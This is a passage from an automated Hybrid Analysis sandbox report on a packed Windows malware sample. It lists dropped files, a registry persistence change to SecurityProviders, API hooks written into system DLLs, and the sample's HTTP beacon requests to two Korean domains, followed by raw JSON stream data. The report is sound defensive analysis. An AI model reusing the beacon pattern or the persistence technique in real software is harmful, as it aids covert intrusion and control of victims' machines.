/eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=3740962\u0026sc=b984cf5bcbf0f38f3d136d1f97103a91\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\n\"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=5265868\u0026sc=2e03e977aa881c76f7df783789a1e026\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\n\"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=6906788\u0026sc=412dd86c4ba55fde5144cf03627da841\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\nsource\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 10 of 25\n\nNetwork Traffic\r\nrelevance\r\n5/10\r\nInstallation/Persistance\r\nConnects to LPC ports\r\ndetails\r\n\"sysprep.exe\" connecting to \"\\ThemeApiPort\"\r\nsource\r\nAPI Call\r\nrelevance\r\n1/10\r\nDropped files\r\ndetails\r\n\"ud.bat\" has type \"DOS batch file ASCII text with CRLF line terminators\"\r\n\"diagerr.xml\" has type \"UTF-8 Unicode (with BOM) text with very long lines\"\r\n\"w7e2219.tmp\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"\r\n\"setuperr.log\" has type \"UTF-8 Unicode (with BOM) text with CRLF line terminators\"\r\n\"~13785.tmp\" has type \"HTML document ASCII text\"\r\n\"RecoveryStore.{B4365893-6E19-11E8-989D-0A00278A626A}.dat\" has type \"Composite Document\r\nFile V2 Document Cannot read section info\"\r\n\"desktop.ini\" has type \"empty\"\r\n\"{B4365894-6E19-11E8-989D-0A00278A626A}.dat\" has type \"Composite Document File V2\r\nDocument Cannot read section info\"\r\n\"~ER24B7.tmp\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"\r\n\"setupact.log\" has type \"UTF-8 Unicode (with BOM) text with CRLF line terminators\"\r\n\"~ER1AFA.tmp\" has type \"PE32 executable (console) Intel 80386 for MS Windows\"\r\n\"diagwrn.xml\" has 
type \"UTF-8 Unicode (with BOM) text\"\r\nsource\r\nBinary File\r\nrelevance\r\n3/10\r\nModifies auto-execute functionality by setting/creating a value in the registry\r\ndetails\r\n\"sysprep.exe\" (Access type: \"SETVAL\"; Path:\r\n\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SECURITYPROVIDERS\"; Key:\r\n\"SECURITYPROVIDERS\"; Value: \"credssp.dll, msimg64.dll\")\r\nsource\r\nRegistry Access\r\nrelevance\r\n8/10\r\nMonitors specific registry key for changes\r\ndetails\r\n\"takeown.exe\" monitors\r\n\"\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4;\r\nSubtree: 0)\r\nsource\r\nAPI Call\r\nrelevance\r\n4/10\r\nOpens the MountPointManager (often used to detect additional infection locations)\r\ndetails\r\n\"iexplore.exe\" opened \"\\Device\\MountPointManager\"\r\n\"takeown.exe\" opened \"\\Device\\MountPointManager\"\r\nsource\r\nAPI Call\r\nrelevance\r\n5/10\r\nTouches files in the Windows directory\r\ndetails\r\n\"\u003cInput Sample\u003e\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\r\n\"~ER1AFA.tmp\" touched file \"C:\\Windows\\Globalization\\Sorting\\SortDefault.nls\"\r\n\"explorer.exe\" touched file \"C:\\Windows\\System32\"\r\n\"explorer.exe\" touched file \"C:\\Windows\\System32\\sysprep\\sysprep.exe\"\r\n\"explorer.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 11 of 25\n\n\"explorer.exe\" touched file \"C:\\Windows\\System32\\sysprep\"\r\n\"explorer.exe\" touched file \"%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Administrative Tools\\System Configuration.lnk\"\r\n\"explorer.exe\" touched file \"C:\\Windows\\System32\\msconfig.exe\"\r\n\"explorer.exe\" touched file\r\n\"C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\"\r\n\"explorer.exe\" touched 
file\r\n\"C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\dcd5734867e97.customDestination\r\nms\"\r\n\"explorer.exe\" touched file\r\n\"C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\"\r\n\"explorer.exe\" touched file\r\n\"C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\cbc036d6fdb69fb5.customDestinat\r\nms\"\r\nsource\r\nAPI Call\r\nrelevance\r\n7/10\r\nNetwork Related\r\nFound potential URL in binary/memory\r\ndetails\r\nPattern match: \"http://schemas.microsoft.com/SMI/2005/WindowsSettings\"\r\nHeuristic match: \"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=3740962\u0026sc=b984cf5bcbf0f38f3d136d1f97103a91\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\nHeuristic match: \"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=5265868\u0026sc=2e03e977aa881c76f7df783789a1e026\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\nHeuristic match: \"GET /eml/goods_list_ok.php?\r\nno=0\u0026id=YH^0A00278A626A[0]\u0026sn=6906788\u0026sc=412dd86c4ba55fde5144cf03627da841\r\nHTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr\"\r\nHeuristic match: \"solarshade.co.kr\"\r\nPattern match: \"www.google.com\"\r\nPattern match: \"http://solarshade.co.kr/eml/goods_list_ok.php\"\r\nPattern match: \"http://lawbookcenter.co.kr/shop/temp/goods_list.php\"\r\nPattern match: \"http://%s\"\r\nsource\r\nFile/Memory\r\nrelevance\r\n10/10\r\nHTTP request contains Base64 encoded artifacts\r\ndetails\r\n\"o8q[qw_tu\"\r\n\"7{i\u003c_{M\"\r\n\"]w^^8q7nk5\"\r\nsource\r\nNetwork Traffic\r\nrelevance\r\n7/10\r\nUnusual Characteristics\r\nInstalls hooks/patches the running process\r\ndetails\r\n\"takeown.exe\" wrote 
bytes\r\n\"4053ed765858ee76186aee76653cef760000000000bf36750000000056cc3675000000007cca36750000000037682a756a2cef76d62de\r\nto virtual address \"0x76FE1000\" (part of module \"NSI.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9e89afcf8\" to virtual address \"0x7550E30C\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9b943f2f8\" to virtual address \"0x75523B9B\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9fda405f9\" to virtual address \"0x755F4731\" (part of module\r\n\"OLEAUT32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9652b03f9\" to virtual address \"0x7550ADF9\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e98b8e05f9\" to virtual address \"0x755F5DEE\" (part of module\r\n\"OLEAUT32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e937f20ef9\" to virtual address \"0x7555E963\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e99ac3c9f8\" to virtual address \"0x759B2694\" (part of module\r\n\"COMDLG32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e99d9af3f8\" to virtual address \"0x755F3E59\" (part of module\r\n\"OLEAUT32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e96ff10ef9\" to virtual address \"0x7555E9C9\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9ee7eeaf8\" to virtual address \"0x757A6143\" (part of module\r\n\"OLE32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9c20a10f9\" to virtual address \"0x7554D274\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9efb971fa\" to virtual address \"0x73F3388E\" (part of module\r\n\"COMCTL32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9e9f00ef9\" to virtual address \"0x7555E9ED\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e955a5f3f8\" to virtual address \"0x755F3EAE\" (part of module\r\n\"OLEAUT32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e99cf30ef9\" to virtual address \"0x7555E869\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e92e0d10f9\" to virtual address \"0x7554CF42\" (part of module\r\n\"USER32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9b296d2f8\" to virtual address \"0x757E9D0B\" (part of module\r\n\"OLE32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9fc7967fa\" to virtual address \"0x73FD7922\" (part of module\r\n\"COMCTL32.DLL\")\r\n\"iexplore.exe\" wrote bytes \"e9b090f7f8\" to virtual address \"0x7550ABE1\" (part of module\r\n\"USER32.DLL\")\r\nsource\r\nHook Detection\r\nrelevance\r\n10/10\r\nMatched Compiler/Packer signature\r\ndetails\r\n\"c9b65b764985dfd7a11d3faf599c56b8.exe.bin\" was detected as \"UPX v1.25 (Delphi) Stub\"\r\n\"w7e2219.tmp\" was detected as \"Visual C++ 2005 DLL -\u003e Microsoft\"\r\n\"~ER24B7.tmp\" was detected as \"Visual C++ 2005 DLL -\u003e Microsoft\"\r\n\"~ER1AFA.tmp\" was detected as \"VC8 -\u003e Microsoft Corporation\"\r\nsource\r\nStatic Parser\r\nrelevance\r\n10/10\r\nReads information about supported languages\r\ndetails\r\n\"sysprep.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key:\r\n\"00000409\")\r\nsource\r\nRegistry Access\r\nrelevance\r\n3/10\r\nFile Details\r\nAll Details:\r\nc9b65b764985dfd7a11d3faf599c56b8\r\nFile Sections\r\nName | Entropy | Virtual Address | Virtual Size | Raw Size | MD5\r\nUPX0 | 0 | 0x1000 | 0x22d000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e\r\nUPX1 | 7.9309190833 | 0x22e000 | 0x4c000 | 0x4ba00 | fafee9506c2cb7606718693156703f67\r\n.rsrc | 4.06720567587 | 0x27a000 | 0x1000 | 0x600 | 80e9f3854461573cdd5ef15498a07fd4\r\nFile Resources\r\nFile Imports\r\nADVAPI32.dll\r\nKERNEL32.DLL\r\nScreenshots\r\nHybrid Analysis\r\nAnalysed 10 processes in total.\r\n c9b65b764985dfd7a11d3faf599c56b8.exe (PID: 2084) 46/66\r\nNetwork Analysis\r\nDNS Requests\r\nHTTP Traffic\r\nSuricata Alerts\r\nET rules applied using Suricata.\r\nExtracted Files\r\nDisplaying 12 extracted file(s). The remaining 4 file(s) are available in the full version and XML/JSON reports.\r\nud.bat\r\ndesktop.ini\r\nFilepath\r\n%USERPROFILE%\\Desktop\\desktop.ini\r\nSize\r\nUnknown (0 bytes)\r\nType\r\nempty\r\nRuntime Process\r\niexplore.exe (PID: 2672)\r\nWarnings\r\nAdded comment to Virus Total report\r\nEnforcing malicious verdict, as a reliable source indicates high confidence\r\nNot all sources for indicator ID \"api-51\" are available in the report\r\nNot all sources for indicator ID \"api-55\" are available in the report\r\nNot all sources for indicator ID \"hooks-8\" are available in the report\r\nNot all sources for indicator ID \"mutant-0\" are available in the report\r\nHybrid Analysis requires that users undergo the Hybrid Analysis Vetting Process prior to obtaining an API 
key or\r\ndownloading malware samples. Please note that you must abide by the Hybrid Analysis Terms and Conditions and only use\r\nthese samples for research purposes. You are not permitted to share your user credentials or API key with anyone else.\r\nPlease notify Hybrid Analysis immediately if you believe that your API key or user credentials have been compromised.\r\n{\"id\":\"5b1f12537ca3e160de29d536\",\"sample_targets_streams_data\":{\"62573-882-004E1B40\":{\"uid\":\"62573-882-\r\n004E1B40\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\
":2,\"instructions\":465},\"62573-2484-00465E40\":{\"uid\":\"62573-2484-\r\n00465E40\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":428},\"62573-2513-00464440\":{\"uid\":\"62573-2513-\r\n00464440\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":497},\"62573-8065-004E3F00\":{\"uid\":\"62573-8065-\r\n004E3F00\",\"file_uid\":\"2b4a35efb99528b48b722b06e33703debd9463e097734ae2799ac00792cc30d5\",\"child_target_uid\":\"00013602-\r\n00002084\",\"stream_type\":2,\"instructions\":483},\"13476-912-10029670\":{\"uid\":\"13476-912-\r\n10029670\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":1135},\"13476-157-1000A870\":{\"uid\":\"13476-157-\r\n1000A870\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":819},\"13476-665-10003290\":{\"uid\":\"13476-665-\r\n10003290\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 19 of 
25\n\n00003272\",\"stream_type\":2,\"instructions\":240},\"13476-629-100047B0\":{\"uid\":\"13476-629-\r\n100047B0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":665},\"13476-1019-1001CAD7\":{\"uid\":\"13476-1019-\r\n1001CAD7\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":1173},\"13476-954-1002B597\":{\"uid\":\"13476-954-\r\n1002B597\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":284},\"13476-1021-1001DE37\":{\"uid\":\"13476-1021-\r\n1001DE37\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":750},\"13476-144-10014524\":{\"uid\":\"13476-144-\r\n10014524\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":741},\"13476-467-10010B00\":{\"uid\":\"13476-467-\r\n10010B00\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":131},\"13476-607-10006A00\":{\"uid\":\"13476-607-\r\n10006A00\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":214},\"13476-531-1000BFD0\":{\"uid\":\"13476-531-\r\n1000BFD0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":458},\"13476-628-10004F80\":{\"uid\":\"13476-628-\r\n10004F80\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022e
eab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":291},\"13476-604-10006DC0\":{\"uid\":\"13476-604-\r\n10006DC0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":298},\"13476-863-100221B5\":{\"uid\":\"13476-863-\r\n100221B5\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":172},\"13476-546-1000B290\":{\"uid\":\"13476-546-\r\n1000B290\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":193},\"13476-561-100018C0\":{\"uid\":\"13476-561-\r\n100018C0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":224},\"13476-689-100012D0\":{\"uid\":\"13476-689-\r\n100012D0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":152},\"13476-961-10028A43\":{\"uid\":\"13476-961-\r\n10028A43\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":450},\"13476-660-100037E0\":{\"uid\":\"13476-660-\r\n100037E0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":84},\"13476-599-10009210\":{\"uid\":\"13476-599-\r\n10009210\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":188},\"13476-482-1000F300\":{\"uid\":\"13476-482-\r\n1000F300\",\"fi
le_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":217},\"13476-402-1002DCD0\":{\"uid\":\"13476-402-\r\n1002DCD0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":52},\"13476-667-100016F0\":{\"uid\":\"13476-667-\r\n100016F0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":146},\"13476-584-10007DC0\":{\"uid\":\"13476-584-\r\n10007DC0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":93},\"13476-538-1000BC00\":{\"uid\":\"13476-538-\r\n1000BC00\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":191},\"13476-477-10010110\":{\"uid\":\"13476-477-\r\n10010110\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":659},\"13476-664-10001CE0\":{\"uid\":\"13476-664-\r\n10001CE0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":151},\"13476-659-10001F00\":{\"uid\":\"13476-659-\r\n10001F00\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":169},\"13476-702-100068C0\":{\"uid\":\"13476-702-\r\n100068C0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":124},\"13476-480-1
000FA60\":{\"uid\":\"13476-480-\r\n1000FA60\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":121},\"13476-539-1000B9E0\":{\"uid\":\"13476-539-\r\n1000B9E0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":150},\"13476-479-1000FBC0\":{\"uid\":\"13476-479-\r\n1000FBC0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":98},\"13476-478-1000FCF0\":{\"uid\":\"13476-478-\r\n1000FCF0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":83},\"13476-564-10009C10\":{\"uid\":\"13476-564-\r\n10009C10\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":299},\"13476-873-100238C0\":{\"uid\":\"13476-873-\r\n100238C0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 20 of 
25\n\n00003272\",\"stream_type\":2,\"instructions\":1786},\"13476-571-10008DA0\":{\"uid\":\"13476-571-\r\n10008DA0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":210},\"13476-1042-10022478\":{\"uid\":\"13476-1042-\r\n10022478\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":1706},\"13476-592-10007780\":{\"uid\":\"13476-592-\r\n10007780\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":270},\"13476-713-10011040\":{\"uid\":\"13476-713-\r\n10011040\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":197},\"13476-668-100094B0\":{\"uid\":\"13476-668-\r\n100094B0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":191},\"13476-582-10007FC0\":{\"uid\":\"13476-582-\r\n10007FC0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":111},\"13476-960-10028446\":{\"uid\":\"13476-960-\r\n10028446\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":233},\"13476-555-10009900\":{\"uid\":\"13476-555-\r\n10009900\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":160},\"13476-613-100057E0\":{\"uid\":\"13476-613-\r\n100057E0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022ee
ab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":280},\"13476-697-10003DE0\":{\"uid\":\"13476-697-\r\n10003DE0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":192},\"13476-30-1001BFEC\":{\"uid\":\"13476-30-\r\n1001BFEC\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":134},\"13476-994-1001BBC7\":{\"uid\":\"13476-994-\r\n1001BBC7\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":82},\"13476-540-1000B8C0\":{\"uid\":\"13476-540-\r\n1000B8C0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":87},\"13476-956-1002947A\":{\"uid\":\"13476-956-\r\n1002947A\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":97},\"13476-557-1000A1F0\":{\"uid\":\"13476-557-\r\n1000A1F0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":236},\"13476-650-10009A90\":{\"uid\":\"13476-650-\r\n10009A90\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":163},\"13476-601-10007290\":{\"uid\":\"13476-601-\r\n10007290\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":223},\"13476-666-10001B80\":{\"uid\":\"13476-666-\r\n10001B80\",\"file_ui
d\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":72},\"13476-517-1000F190\":{\"uid\":\"13476-517-\r\n1000F190\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":76},\"13476-556-1000A510\":{\"uid\":\"13476-556-\r\n1000A510\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":143},\"13476-192-10015E50\":{\"uid\":\"13476-192-\r\n10015E50\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":217},\"13476-567-10009840\":{\"uid\":\"13476-567-\r\n10009840\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":59},\"13476-597-100084D0\":{\"uid\":\"13476-597-\r\n100084D0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"child_target_uid\":\"00014008-\r\n00003272\",\"stream_type\":2,\"instructions\":138},\"13476-610-10005BC0\":{\"uid\":\"13476-610-\r\n10005BC0\",\"file_uid\":\"b9441969f368c84b03275dde17fed0fea3a8022eeab9141c45ef22dd0dea3d6c\",\"chil